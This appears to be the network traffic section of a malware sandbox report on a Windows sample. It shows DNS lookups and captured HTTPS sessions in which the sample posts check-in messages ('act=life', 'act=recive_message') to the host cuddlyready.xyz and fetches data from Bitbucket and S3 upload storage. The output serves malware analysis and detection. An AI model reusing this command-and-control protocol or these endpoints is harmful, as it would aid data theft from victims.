                                                                                                                                                        Dec 23, 2024 08:19:36.668200970 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.675460100 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.675501108 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.675527096 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.675534964 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.675569057 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.675594091 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.681997061 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.682022095 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.682070971 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.682079077 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.682110071 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.682130098 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.682133913 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.688548088 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.688570976 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.688599110 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.688606024 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.688631058 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.694741011 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.694792986 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.694804907 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.694812059 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.694853067 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.695529938 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.695700884 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.702136993 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.702157974 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.702193975 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.702204943 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.702212095 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.702239990 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.702265024 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.708678007 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.708695889 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.708736897 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.708745956 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.708770990 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.714104891 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.714114904 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.714189053 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.857893944 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.857918978 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.857959032 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.857979059 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.858006001 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.858026981 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.858031988 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.864388943 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.864415884 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.864453077 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.864459038 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.864490986 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.871515989 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.871566057 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.871575117 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.871579885 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.871628046 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.877618074 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.877636909 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.877684116 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.877691031 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.877723932 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.877739906 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.878412008 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.884552956 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.884576082 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.884617090 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.884643078 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.884659052 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.890423059 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.890429974 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.890486002 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.891040087 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.891056061 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.891079903 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.891089916 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.891097069 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.891129017 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.897574902 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.897595882 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.897659063 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.897667885 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.897697926 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.911922932 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.911940098 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.911998034 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.046412945 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.046438932 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.046539068 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.046581030 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.046591997 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.046715975 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.047168016 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.052959919 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.052975893 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.053052902 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.053065062 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.053086042 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.059393883 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.059432030 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.059469938 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.059479952 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.059505939 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.066077948 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.066142082 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.066150904 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.066160917 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.066200018 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.066797018 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.066855907 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.073407888 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.073424101 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.073482990 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.073518991 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.073530912 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.073554993 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.079564095 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.079582930 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.079699993 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.079711914 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.086077929 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.086122990 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.086146116 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.086157084 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.086191893 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.092643976 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.092709064 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.092752934 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.092763901 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.092803001 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.108848095 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.108856916 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.108911991 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.108933926 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.241355896 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.241375923 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.241456985 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.241468906 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.241559029 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.242130041 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.249758959 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.249773026 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.249819040 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.249826908 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.249874115 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.256383896 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.256403923 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.256438971 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.256449938 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.256488085 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.260057926 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.260094881 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.260119915 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:37.260124922 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.260164976 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:37.270183086 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:38.024707079 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:38.024707079 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:38.024760008 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:38.024775982 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Dec 23, 2024 08:19:02.067099094 CET5575553192.168.2.71.1.1.1
                                                                                                                                                        Dec 23, 2024 08:19:02.217029095 CET53557551.1.1.1192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:30.522562027 CET5364053192.168.2.71.1.1.1
                                                                                                                                                        Dec 23, 2024 08:19:30.659388065 CET53536401.1.1.1192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:32.752487898 CET5944153192.168.2.71.1.1.1
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET53594411.1.1.1192.168.2.7
                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                        Dec 23, 2024 08:19:02.067099094 CET192.168.2.71.1.1.10x92f0Standard query (0)cuddlyready.xyzA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:30.522562027 CET192.168.2.71.1.1.10x8486Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:32.752487898 CET192.168.2.71.1.1.10xd46bStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                        Dec 23, 2024 08:19:02.217029095 CET1.1.1.1192.168.2.70x92f0No error (0)cuddlyready.xyz104.21.32.96A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:02.217029095 CET1.1.1.1192.168.2.70x92f0No error (0)cuddlyready.xyz172.67.150.173A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:30.659388065 CET1.1.1.1192.168.2.70x8486No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:30.659388065 CET1.1.1.1192.168.2.70x8486No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:30.659388065 CET1.1.1.1192.168.2.70x8486No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET1.1.1.1192.168.2.70xd46bNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET1.1.1.1192.168.2.70xd46bNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET1.1.1.1192.168.2.70xd46bNo error (0)s3-w.us-east-1.amazonaws.com16.182.101.249A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET1.1.1.1192.168.2.70xd46bNo error (0)s3-w.us-east-1.amazonaws.com3.5.21.138A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET1.1.1.1192.168.2.70xd46bNo error (0)s3-w.us-east-1.amazonaws.com3.5.25.73A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET1.1.1.1192.168.2.70xd46bNo error (0)s3-w.us-east-1.amazonaws.com16.182.100.153A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET1.1.1.1192.168.2.70xd46bNo error (0)s3-w.us-east-1.amazonaws.com3.5.29.129A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET1.1.1.1192.168.2.70xd46bNo error (0)s3-w.us-east-1.amazonaws.com3.5.25.30A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET1.1.1.1192.168.2.70xd46bNo error (0)s3-w.us-east-1.amazonaws.com16.182.36.113A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET1.1.1.1192.168.2.70xd46bNo error (0)s3-w.us-east-1.amazonaws.com16.182.107.33A (IP address)IN (0x0001)false
                                                                                                                                                        • cuddlyready.xyz
                                                                                                                                                        • bitbucket.org
                                                                                                                                                        • bbuseruploads.s3.amazonaws.com
                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.749700104.21.32.964437624C:\Users\user\Desktop\LP4a6BowQN.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-23 07:19:03 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 8
                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                        2024-12-23 07:19:03 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                        2024-12-23 07:19:04 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:04 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=4c8gi0edd82gd0o712h24jb3op; expires=Fri, 18 Apr 2025 01:05:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hZzCWZwaDTzQ1uG3Ckq%2Fgs2yY%2FAibQ5ayrz%2FVgj8UpDbXuh6g%2BSmUp%2FBoVxWtj7Fnokr46axztzdKwPfkhSm1NHSaVwnJ3Tl8DEW1Ozk5v%2BtJZBMu5oV3kz7%2Fu1OD%2F6mD1M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f6694c88abd1851-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1535&rtt_var=582&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1902280&cwnd=214&unsent_bytes=0&cid=916e5633bac12acc&ts=762&x=0"
                                                                                                                                                        2024-12-23 07:19:04 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                        2024-12-23 07:19:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.2.749701104.21.32.964437624C:\Users\user\Desktop\LP4a6BowQN.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-23 07:19:05 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 53
                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                        2024-12-23 07:19:05 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                        2024-12-23 07:19:11 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:11 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=aks1qvtqhhrubif3phc9nfnk97; expires=Fri, 18 Apr 2025 01:05:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZyqOJ3kEMU8lcIH1ly%2BbXXC0p4tA5J5jgpY6FBWrucpPH0uG9HAsC0tBVLVp4p8YRNVTvy4nCtvdE864DJJBQgCytHKZqJngUE8PeJoOzFR7ANz147qtdyu4rgk4g%2F49pOs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f6694d5ae5741ad-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1550&rtt_var=608&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=952&delivery_rate=1762220&cwnd=189&unsent_bytes=0&cid=a1d3428697b5805c&ts=5940&x=0"
                                                                                                                                                        2024-12-23 07:19:11 UTC247INData Raw: 34 36 66 0d 0a 59 7a 56 41 63 63 4f 4a 53 38 55 6f 49 69 2b 6a 46 57 45 37 4d 63 6f 75 4e 6b 2f 52 65 79 33 4a 34 42 6a 35 43 47 30 4d 6b 6a 38 59 46 7a 5a 54 2b 62 31 6e 35 31 74 48 44 5a 6c 68 45 30 35 55 35 67 78 58 4b 2f 4e 42 53 36 69 4d 61 35 77 6b 54 33 72 2f 48 56 6c 54 49 52 32 77 37 47 66 6e 54 56 6f 4e 6d 55 34 61 47 56 53 6b 44 41 78 74 74 42 46 50 71 49 78 36 6d 47 4d 43 66 50 35 63 43 31 6b 6e 47 61 62 71 4c 36 52 45 54 30 72 47 63 41 42 52 58 36 4e 44 58 69 4c 7a 56 77 2b 73 6d 6a 72 44 4b 69 42 70 35 6c 34 75 56 44 4d 61 34 66 52 6e 76 67 70 48 51 59 45 76 51 31 70 55 71 45 4a 51 4b 37 6f 54 52 61 47 45 65 35 31 69 48 57 58 30 56 77 74 58 4a 42 69 73 34 7a 75 70 54 6b 68 42 77 48 6f 41 47 52 33 6f 53 30 78 74 36 31
                                                                                                                                                        Data Ascii: 46fYzVAccOJS8UoIi+jFWE7McouNk/Rey3J4Bj5CG0Mkj8YFzZT+b1n51tHDZlhE05U5gxXK/NBS6iMa5wkT3r/HVlTIR2w7GfnTVoNmU4aGVSkDAxttBFPqIx6mGMCfP5cC1knGabqL6RET0rGcABRX6NDXiLzVw+smjrDKiBp5l4uVDMa4fRnvgpHQYEvQ1pUqEJQK7oTRaGEe51iHWX0VwtXJBis4zupTkhBwHoAGR3oS0xt61
                                                                                                                                                        2024-12-23 07:19:11 UTC895INData Raw: 6b 63 6d 59 46 72 69 6e 38 43 66 76 59 64 48 68 6b 37 55 36 62 6e 61 66 38 4b 53 45 48 50 63 67 42 57 56 4b 6c 4d 52 69 4b 7a 47 6b 65 6a 68 6e 43 55 5a 51 42 67 2b 6c 6f 4a 58 69 55 63 70 75 4d 76 71 45 6b 41 41 34 46 77 47 78 6b 4c 36 47 78 45 4c 72 41 4e 51 72 72 43 5a 64 56 7a 54 32 6e 38 48 56 6b 58 4a 42 32 67 35 69 6d 31 51 6b 74 47 78 47 55 49 55 46 36 6c 54 46 6b 6e 76 42 70 50 72 49 68 77 6c 47 41 4c 59 2f 31 62 41 56 64 69 58 65 48 73 4d 65 63 53 41 47 37 45 5a 77 52 56 52 65 70 32 46 44 4c 39 41 41 2b 73 6a 6a 72 44 4b 67 64 72 38 31 34 4b 57 43 45 62 71 76 6b 70 74 55 78 4e 53 4e 4e 78 42 6c 64 5a 71 31 35 65 49 37 55 61 52 71 43 4c 66 35 78 75 54 79 43 77 57 68 6b 58 65 6c 4f 41 35 69 4b 72 51 46 64 4e 67 57 68 4e 51 42 4f 76 51 42 52 31 38
                                                                                                                                                        Data Ascii: kcmYFrin8CfvYdHhk7U6bnaf8KSEHPcgBWVKlMRiKzGkejhnCUZQBg+loJXiUcpuMvqEkAA4FwGxkL6GxELrANQrrCZdVzT2n8HVkXJB2g5im1QktGxGUIUF6lTFknvBpPrIhwlGALY/1bAVdiXeHsMecSAG7EZwRVRep2FDL9AA+sjjrDKgdr814KWCEbqvkptUxNSNNxBldZq15eI7UaRqCLf5xuTyCwWhkXelOA5iKrQFdNgWhNQBOvQBR18
